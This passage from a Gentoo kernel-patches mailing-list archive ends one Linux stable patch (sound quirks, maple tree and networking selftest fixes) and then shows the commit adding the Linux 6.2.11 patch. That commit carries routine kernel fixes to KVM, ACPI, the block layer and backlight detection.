+ 				"DFI LanParty", STAC_92HD73XX_REF),
++	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5001,
++				"Intel DP45SG", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5002,
+ 				"Intel DG45ID", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5003,
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 1f36bc1c5d362..2a16939cf0285 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -108,6 +108,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mn->slot[1] != NULL);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+ 
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	mas.node = MAS_START;
+ 	mas_nomem(&mas, GFP_KERNEL);
+@@ -160,6 +161,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i);
+ 		MT_BUG_ON(mt, !mn);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -192,6 +194,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, not_empty(mn));
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i - 1);
+ 		MT_BUG_ON(mt, !mn);
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -210,6 +213,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != j - 1);
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -233,6 +237,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j);
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j - 1);
+ 		}
+@@ -269,6 +274,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -294,6 +300,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas2); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas2) != 0);
+@@ -334,10 +341,12 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	for (i = 1; i <= MAPLE_ALLOC_SLOTS + 1; i++) {
+ 		mn = mas_pop_node(&mas);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -375,6 +384,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 
+@@ -382,10 +392,13 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 	}
+@@ -35369,6 +35382,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, allocated != 1 + height * 3);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != allocated - 1);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+ 	mas_destroy(&mas);
+@@ -35386,6 +35400,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	mas_destroy(&mas);
+ 	allocated = mas_allocated(&mas);
+ 	MT_BUG_ON(mt, allocated != 0);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+@@ -35756,6 +35771,7 @@ void farmer_tests(void)
+ 	tree.ma_root = mt_mk_node(node, maple_leaf_64);
+ 	mt_dump(&tree);
+ 
++	node->parent = ma_parent_ptr(node);
+ 	ma_free_rcu(node);
+ 
+ 	/* Check things that will make lockdep angry */
+diff --git a/tools/testing/selftests/bpf/progs/find_vma_fail1.c b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+index b3b326b8e2d1c..6dab9cffda132 100644
+--- a/tools/testing/selftests/bpf/progs/find_vma_fail1.c
++++ b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ #include "vmlinux.h"
+ #include <bpf/bpf_helpers.h>
++#define vm_flags vm_start
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/net/config b/tools/testing/selftests/net/config
+index bd89198cd8176..84833cb491998 100644
+--- a/tools/testing/selftests/net/config
++++ b/tools/testing/selftests/net/config
+@@ -45,3 +45,4 @@ CONFIG_BAREUDP=m
+ CONFIG_IPV6_IOAM6_LWTUNNEL=y
+ CONFIG_CRYPTO_SM4_GENERIC=y
+ CONFIG_AMT=m
++CONFIG_IP_SCTP=m
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index ab2d581f28a1d..c61f3aea66caf 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -884,6 +884,7 @@ test_listener()
+ 		$client4_port > /dev/null 2>&1 &
+ 	local listener_pid=$!
+ 
++	sleep 0.5
+ 	verify_listener_events $client_evts $LISTENER_CREATED $AF_INET 10.0.2.2 $client4_port
+ 
+ 	# ADD_ADDR from client to server machine reusing the subflow port
+@@ -899,6 +900,7 @@ test_listener()
+ 	# Delete the listener from the client ns, if one was created
+ 	kill_wait $listener_pid
+ 
++	sleep 0.5
+ 	verify_listener_events $client_evts $LISTENER_CLOSED $AF_INET 10.0.2.2 $client4_port
+ }
+ 
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 3243c90d449e6..5d467d1993cb1 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -62,7 +62,7 @@ class OvsDatapath(GenericNetlinkSocket):
+         nla_map = (
+             ("OVS_DP_ATTR_UNSPEC", "none"),
+             ("OVS_DP_ATTR_NAME", "asciiz"),
+-            ("OVS_DP_ATTR_UPCALL_PID", "uint32"),
++            ("OVS_DP_ATTR_UPCALL_PID", "array(uint32)"),
+             ("OVS_DP_ATTR_STATS", "dpstats"),
+             ("OVS_DP_ATTR_MEGAFLOW_STATS", "megaflowstats"),
+             ("OVS_DP_ATTR_USER_FEATURES", "uint32"),


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-13 16:08 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-04-13 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     cd6cc577187a06e6012d8bdf191e1368c8aa348b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 13 16:08:32 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Apr 13 16:08:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cd6cc577

Linux patch 6.2.11

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1010_linux-6.2.11.patch | 13594 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 13598 insertions(+)

diff --git a/0000_README b/0000_README
index 93bcb21e..eb41631d 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  1009_linux-6.2.10.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.10
 
+Patch:  1010_linux-6.2.11.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.11
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1010_linux-6.2.11.patch b/1010_linux-6.2.11.patch
new file mode 100644
index 00000000..484b212a
--- /dev/null
+++ b/1010_linux-6.2.11.patch
@@ -0,0 +1,13594 @@
+diff --git a/Documentation/devicetree/bindings/serial/renesas,scif.yaml b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+index f81f2d67a1ed4..38391a5d96bfe 100644
+--- a/Documentation/devicetree/bindings/serial/renesas,scif.yaml
++++ b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+@@ -92,7 +92,7 @@ properties:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+           - description: Transmit buffer empty interrupt
+-          - description: Transmit End interrupt
++          - description: Break interrupt
+       - items:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+@@ -107,7 +107,7 @@ properties:
+           - const: eri
+           - const: rxi
+           - const: txi
+-          - const: tei
++          - const: bri
+       - items:
+           - const: eri
+           - const: rxi
+diff --git a/Documentation/mm/zsmalloc.rst b/Documentation/mm/zsmalloc.rst
+index 6e79893d61326..d98607aa9c1fd 100644
+--- a/Documentation/mm/zsmalloc.rst
++++ b/Documentation/mm/zsmalloc.rst
+@@ -68,6 +68,8 @@ pages_used
+ 	the number of pages allocated for the class
+ pages_per_zspage
+ 	the number of 0-order pages to make a zspage
++freeable
++	the approximate number of pages class compaction can free
+ 
+ We assign a zspage to ZS_ALMOST_EMPTY fullness group when n <= N / f, where
+ 
+diff --git a/Makefile b/Makefile
+index 6ec0ec452e465..416490daa76ad 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 10
++SUBLEVEL = 11
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kernel/compat_alignment.c b/arch/arm64/kernel/compat_alignment.c
+index 5edec2f49ec98..deff21bfa6800 100644
+--- a/arch/arm64/kernel/compat_alignment.c
++++ b/arch/arm64/kernel/compat_alignment.c
+@@ -314,36 +314,32 @@ int do_compat_alignment_fixup(unsigned long addr, struct pt_regs *regs)
+ 	int (*handler)(unsigned long addr, u32 instr, struct pt_regs *regs);
+ 	unsigned int type;
+ 	u32 instr = 0;
+-	u16 tinstr = 0;
+ 	int isize = 4;
+ 	int thumb2_32b = 0;
+-	int fault;
+ 
+ 	instrptr = instruction_pointer(regs);
+ 
+ 	if (compat_thumb_mode(regs)) {
+ 		__le16 __user *ptr = (__le16 __user *)(instrptr & ~1);
++		u16 tinstr, tinst2;
+ 
+-		fault = alignment_get_thumb(regs, ptr, &tinstr);
+-		if (!fault) {
+-			if (IS_T32(tinstr)) {
+-				/* Thumb-2 32-bit */
+-				u16 tinst2;
+-				fault = alignment_get_thumb(regs, ptr + 1, &tinst2);
+-				instr = ((u32)tinstr << 16) | tinst2;
+-				thumb2_32b = 1;
+-			} else {
+-				isize = 2;
+-				instr = thumb2arm(tinstr);
+-			}
++		if (alignment_get_thumb(regs, ptr, &tinstr))
++			return 1;
++
++		if (IS_T32(tinstr)) { /* Thumb-2 32-bit */
++			if (alignment_get_thumb(regs, ptr + 1, &tinst2))
++				return 1;
++			instr = ((u32)tinstr << 16) | tinst2;
++			thumb2_32b = 1;
++		} else {
++			isize = 2;
++			instr = thumb2arm(tinstr);
+ 		}
+ 	} else {
+-		fault = alignment_get_arm(regs, (__le32 __user *)instrptr, &instr);
++		if (alignment_get_arm(regs, (__le32 __user *)instrptr, &instr))
++			return 1;
+ 	}
+ 
+-	if (fault)
+-		return 1;
+-
+ 	switch (CODING_BITS(instr)) {
+ 	case 0x00000000:	/* 3.13.4 load/store instruction extensions */
+ 		if (LDSTHD_I_BIT(instr))
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index 0ee02dae14b2b..2cda8d9d7c6ef 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -271,10 +271,18 @@ static int handle_prog(struct kvm_vcpu *vcpu)
+  * handle_external_interrupt - used for external interruption interceptions
+  * @vcpu: virtual cpu
+  *
+- * This interception only occurs if the CPUSTAT_EXT_INT bit was set, or if
+- * the new PSW does not have external interrupts disabled. In the first case,
+- * we've got to deliver the interrupt manually, and in the second case, we
+- * drop to userspace to handle the situation there.
++ * This interception occurs if:
++ * - the CPUSTAT_EXT_INT bit was already set when the external interrupt
++ *   occurred. In this case, the interrupt needs to be injected manually to
++ *   preserve interrupt priority.
++ * - the external new PSW has external interrupts enabled, which will cause an
++ *   interruption loop. We drop to userspace in this case.
++ *
++ * The latter case can be detected by inspecting the external mask bit in the
++ * external new psw.
++ *
++ * Under PV, only the latter case can occur, since interrupt priorities are
++ * handled in the ultravisor.
+  */
+ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ {
+@@ -285,10 +293,18 @@ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ 
+ 	vcpu->stat.exit_external_interrupt++;
+ 
+-	rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
+-	if (rc)
+-		return rc;
+-	/* We can not handle clock comparator or timer interrupt with bad PSW */
++	if (kvm_s390_pv_cpu_is_protected(vcpu)) {
++		newpsw = vcpu->arch.sie_block->gpsw;
++	} else {
++		rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
++		if (rc)
++			return rc;
++	}
++
++	/*
++	 * Clock comparator or timer interrupt with external interrupt enabled
++	 * will cause interrupt loop. Drop to userspace.
++	 */
+ 	if ((eic == EXT_IRQ_CLK_COMP || eic == EXT_IRQ_CPU_TIMER) &&
+ 	    (newpsw.mask & PSW_MASK_EXT))
+ 		return -EOPNOTSUPP;
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 518bda50068cb..0f762070a5e10 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -146,7 +146,11 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+-	if (madt->header.revision >= 5)
++
++	/* ACPI 6.3 and newer support the online capable bit. */
++	if (acpi_gbl_FADT.header.revision > 6 ||
++	    (acpi_gbl_FADT.header.revision == 6 &&
++	     acpi_gbl_FADT.minor_revision >= 3))
+ 		acpi_support_online_capable = true;
+ 
+ 	default_acpi_madt_oem_check(madt->header.oem_id,
+@@ -193,7 +197,8 @@ static bool __init acpi_is_processor_usable(u32 lapic_flags)
+ 	if (lapic_flags & ACPI_MADT_ENABLED)
+ 		return true;
+ 
+-	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_support_online_capable ||
++	    (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
+ 		return true;
+ 
+ 	return false;
+diff --git a/arch/x86/kvm/kvm_onhyperv.h b/arch/x86/kvm/kvm_onhyperv.h
+index 287e98ef9df3d..6272dabec02da 100644
+--- a/arch/x86/kvm/kvm_onhyperv.h
++++ b/arch/x86/kvm/kvm_onhyperv.h
+@@ -12,6 +12,11 @@ int hv_remote_flush_tlb_with_range(struct kvm *kvm,
+ int hv_remote_flush_tlb(struct kvm *kvm);
+ void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp);
+ #else /* !CONFIG_HYPERV */
++static inline int hv_remote_flush_tlb(struct kvm *kvm)
++{
++	return -EOPNOTSUPP;
++}
++
+ static inline void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp)
+ {
+ }
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index f03bdaf79c886..a682ca4c9fe11 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3718,7 +3718,7 @@ static void svm_enable_nmi_window(struct kvm_vcpu *vcpu)
+ 	svm->vmcb->save.rflags |= (X86_EFLAGS_TF | X86_EFLAGS_RF);
+ }
+ 
+-static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++static void svm_flush_tlb_asid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
+@@ -3742,6 +3742,37 @@ static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
+ 		svm->current_vmcb->asid_generation--;
+ }
+ 
++static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++{
++	hpa_t root_tdp = vcpu->arch.mmu->root.hpa;
++
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, explicitly
++	 * flush the NPT mappings via hypercall as flushing the ASID only
++	 * affects virtual to physical mappings, it does not invalidate guest
++	 * physical to host physical mappings.
++	 */
++	if (svm_hv_is_enlightened_tlb_enabled(vcpu) && VALID_PAGE(root_tdp))
++		hyperv_flush_guest_mapping(root_tdp);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
++static void svm_flush_tlb_all(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, remote TLB
++	 * flushes should be routed to hv_remote_flush_tlb() without requesting
++	 * a "regular" remote flush.  Reaching this point means either there's
++	 * a KVM bug or a prior hv_remote_flush_tlb() call failed, both of
++	 * which might be fatal to the guest.  Yell, but try to recover.
++	 */
++	if (WARN_ON_ONCE(svm_hv_is_enlightened_tlb_enabled(vcpu)))
++		hv_remote_flush_tlb(vcpu->kvm);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
+ static void svm_flush_tlb_gva(struct kvm_vcpu *vcpu, gva_t gva)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4747,10 +4778,10 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_rflags = svm_set_rflags,
+ 	.get_if_flag = svm_get_if_flag,
+ 
+-	.flush_tlb_all = svm_flush_tlb_current,
++	.flush_tlb_all = svm_flush_tlb_all,
+ 	.flush_tlb_current = svm_flush_tlb_current,
+ 	.flush_tlb_gva = svm_flush_tlb_gva,
+-	.flush_tlb_guest = svm_flush_tlb_current,
++	.flush_tlb_guest = svm_flush_tlb_asid,
+ 
+ 	.vcpu_pre_run = svm_vcpu_pre_run,
+ 	.vcpu_run = svm_vcpu_run,
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 65c355b4b8bf0..345b87acf9b04 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -6,6 +6,8 @@
+ #ifndef __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ #define __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ 
++#include <asm/mshyperv.h>
++
+ #if IS_ENABLED(CONFIG_HYPERV)
+ 
+ #include "kvm_onhyperv.h"
+@@ -15,6 +17,14 @@ static struct kvm_x86_ops svm_x86_ops;
+ 
+ int svm_hv_enable_l2_tlb_flush(struct kvm_vcpu *vcpu);
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	struct hv_vmcb_enlightenments *hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
++
++	return ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB &&
++	       !!hve->hv_enlightenments_control.enlightened_npt_tlb;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ 	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+@@ -80,6 +90,11 @@ static inline void svm_hv_update_vp_id(struct vmcb *vmcb, struct kvm_vcpu *vcpu)
+ }
+ #else
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	return false;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index bceb5ad409c63..b7f2e59d50ee4 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3873,7 +3873,12 @@ static void nested_vmx_inject_exception_vmexit(struct kvm_vcpu *vcpu)
+ 		exit_qual = 0;
+ 	}
+ 
+-	if (ex->has_error_code) {
++	/*
++	 * Unlike AMD's Paged Real Mode, which reports an error code on #PF
++	 * VM-Exits even if the CPU is in Real Mode, Intel VMX never sets the
++	 * "has error code" flags on VM-Exit if the CPU is in Real Mode.
++	 */
++	if (ex->has_error_code && is_protmode(vcpu)) {
+ 		/*
+ 		 * Intel CPUs do not generate error codes with bits 31:16 set,
+ 		 * and more importantly VMX disallows setting bits 31:16 in the
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 0ec7a0cb5da81..2d76c254582b0 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9795,13 +9795,20 @@ int kvm_check_nested_events(struct kvm_vcpu *vcpu)
+ 
+ static void kvm_inject_exception(struct kvm_vcpu *vcpu)
+ {
++	/*
++	 * Suppress the error code if the vCPU is in Real Mode, as Real Mode
++	 * exceptions don't report error codes.  The presence of an error code
++	 * is carried with the exception and only stripped when the exception
++	 * is injected as intercepted #PF VM-Exits for AMD's Paged Real Mode do
++	 * report an error code despite the CPU being in Real Mode.
++	 */
++	vcpu->arch.exception.has_error_code &= is_protmode(vcpu);
++
+ 	trace_kvm_inj_exception(vcpu->arch.exception.vector,
+ 				vcpu->arch.exception.has_error_code,
+ 				vcpu->arch.exception.error_code,
+ 				vcpu->arch.exception.injected);
+ 
+-	if (vcpu->arch.exception.error_code && !is_protmode(vcpu))
+-		vcpu->arch.exception.error_code = false;
+ 	static_call(kvm_x86_inject_exception)(vcpu);
+ }
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index c021fb05161b9..86425167594cf 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1359,8 +1359,6 @@ bool blk_rq_is_poll(struct request *rq)
+ 		return false;
+ 	if (rq->mq_hctx->type != HCTX_TYPE_POLL)
+ 		return false;
+-	if (WARN_ON_ONCE(!rq->bio))
+-		return false;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+@@ -1368,7 +1366,7 @@ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+ static void blk_rq_poll_completion(struct request *rq, struct completion *wait)
+ {
+ 	do {
+-		bio_poll(rq->bio, NULL, 0);
++		blk_mq_poll(rq->q, blk_rq_to_qc(rq), NULL, 0);
+ 		cond_resched();
+ 	} while (!completion_done(wait));
+ }
+diff --git a/block/genhd.c b/block/genhd.c
+index 9c4c9aa559ab8..7082032636035 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -368,7 +368,6 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+ 
+-	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	/*
+ 	 * If the device is opened exclusively by current thread already, it's
+ 	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
+@@ -381,12 +380,19 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 			return ret;
+ 	}
+ 
++	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+ 		ret =  PTR_ERR(bdev);
+ 	else
+ 		blkdev_put(bdev, mode & ~FMODE_EXCL);
+ 
++	/*
++	 * If blkdev_get_by_dev() failed early, GD_NEED_PART_SCAN is still set,
++	 * and this will cause that re-assemble partitioned raid device will
++	 * creat partition for underlying disk.
++	 */
++	clear_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(disk->part0, disk_scan_partitions);
+ 	return ret;
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 97b711e57bff4..c7a6d0b69dabd 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1984,6 +1984,7 @@ static int instance;
+ static int acpi_video_bus_add(struct acpi_device *device)
+ {
+ 	struct acpi_video_bus *video;
++	bool auto_detect;
+ 	int error;
+ 	acpi_status status;
+ 
+@@ -2045,10 +2046,20 @@ static int acpi_video_bus_add(struct acpi_device *device)
+ 	mutex_unlock(&video_list_lock);
+ 
+ 	/*
+-	 * The userspace visible backlight_device gets registered separately
+-	 * from acpi_video_register_backlight().
++	 * If backlight-type auto-detection is used then a native backlight may
++	 * show up later and this may change the result from video to native.
++	 * Therefor normally the userspace visible /sys/class/backlight device
++	 * gets registered separately by the GPU driver calling
++	 * acpi_video_register_backlight() when an internal panel is detected.
++	 * Register the backlight now when not using auto-detection, so that
++	 * when the kernel cmdline or DMI-quirks are used the backlight will
++	 * get registered even if acpi_video_register_backlight() is not called.
+ 	 */
+ 	acpi_video_run_bcl_for_osi(video);
++	if (__acpi_video_get_backlight_type(false, &auto_detect) == acpi_backlight_video &&
++	    !auto_detect)
++		acpi_video_bus_register_backlight(video);
++
+ 	acpi_video_bus_add_notify_handler(video);
+ 
+ 	return 0;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 14d6d81e536fe..b3b0b06971df5 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -276,6 +276,43 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * Models which need acpi_video backlight control where the GPU drivers
++	 * do not call acpi_video_register_backlight() because no internal panel
++	 * is detected. Typically these are all-in-ones (monitors with builtin
++	 * PC) where the panel connection shows up as regular DP instead of eDP.
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,1 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,1"),
++		},
++	},
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,2 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,2"),
++		},
++	},
++
++	/*
++	 * Older models with nvidia GPU which need acpi_video backlight
++	 * control and where the old nvidia binary driver series does not
++	 * call acpi_video_register_backlight().
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* ThinkPad W530 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
++		},
++	},
++
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+@@ -774,7 +811,7 @@ static bool prefer_native_over_acpi_video(void)
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+  */
+-static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
++enum acpi_backlight_type __acpi_video_get_backlight_type(bool native, bool *auto_detect)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
+@@ -799,6 +836,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 		native_available = true;
